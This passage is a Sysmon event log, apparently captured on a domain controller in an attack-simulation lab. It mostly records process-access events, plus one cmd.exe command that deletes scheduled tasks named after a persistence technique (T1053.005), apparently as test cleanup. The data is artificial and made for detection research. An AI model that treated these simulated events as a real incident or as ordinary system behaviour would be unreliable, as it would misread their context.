06:55:22.464","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6045,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.464\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.464","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6046,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.464\r\nSourceProcessGUID: {E2A3D6B1-11D8-5F25-0000-001077810800}\r\nSourceProcessId: 3824\r\nSourceThreadId: 4796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-001016CB0800}\r\nTargetProcessId: 4820\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.464","SourceProcessGUID":"{E2A3D6B1-11D8-5F25-0000-001077810800}","SourceProcessId":"3824","SourceThreadId":"4796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-001016CB0800}","TargetProcessId":"4820","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6047,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.464\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-001016CB0800}\r\nTargetProcessId: 4820\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.464","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-001016CB0800}","TargetProcessId":"4820","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6048,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.464\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-001016CB0800}\r\nTargetProcessId: 4820\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.464","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-001016CB0800}","TargetProcessId":"4820","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6049,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.464\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-001016CB0800}\r\nTargetProcessId: 4820\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.464","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-001016CB0800}","TargetProcessId":"4820","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6050,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.481\r\nProcessGuid: {E2A3D6B1-11DA-5F25-0000-00100BCD0800}\r\nProcessId: 3052\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sctasks.exe\r\nCommandLine: schtasks  /delete /tn \"T1053_005_OnStartup\" /f  \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D8-5F25-0000-0020C7800800}\r\nLogonId: 0x880C7\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F\r\nParentProcessGuid: {E2A3D6B1-11DA-5F25-0000-001064CA0800}\r\nParentProcessId: 4720\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"schtasks /delete /tn \"T1053_005_OnLogon\" /f >nul 2>&1 & schtasks /delete /tn \"T1053_005_OnStartup\" /f >nul 2>&1\" ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.481","ProcessGuid":"{E2A3D6B1-11DA-5F25-0000-00100BCD0800}","Image":"C:\\Windows\\System32\\schtasks.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Task Scheduler Configuration Tool","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"sctasks.exe","CommandLine":"schtasks  /delete /tn \"T1053_005_OnStartup\" /f  ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D8-5F25-0000-0020C7800800}","LogonId":"0x880c7","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F","ParentProcessGuid":"{E2A3D6B1-11DA-5F25-0000-001064CA0800}","ParentProcessId":"4720","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"schtasks /delete /tn \"T1053_005_OnLogon\" /f &gt;nul 2&gt;&amp;1 &amp; schtasks /delete /tn \"T1053_005_OnStartup\" /f &gt;nul 2&gt;&amp;1\" ","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6051,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.479\r\nSourceProcessGUID: {E2A3D6B1-11DA-5F25-0000-001064CA0800}\r\nSourceProcessId: 4720\r\nSourceThreadId: 4912\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-11D3-5F25-0000-001030010800}\r\nTargetProcessId: 3052\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+c347|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.479","SourceProcessGUID":"{E2A3D6B1-11DA-5F25-0000-001064CA0800}","SourceProcessId":"4720","SourceThreadId":"4912","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-11D3-5F25-0000-001030010800}","TargetProcessId":"3052","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+c347|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6052,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.479\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D3-5F25-0000-001030010800}\r\nTargetProcessId: 3052\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.479","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D3-5F25-0000-001030010800}","TargetProcessId":"3052","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6053,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.479\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 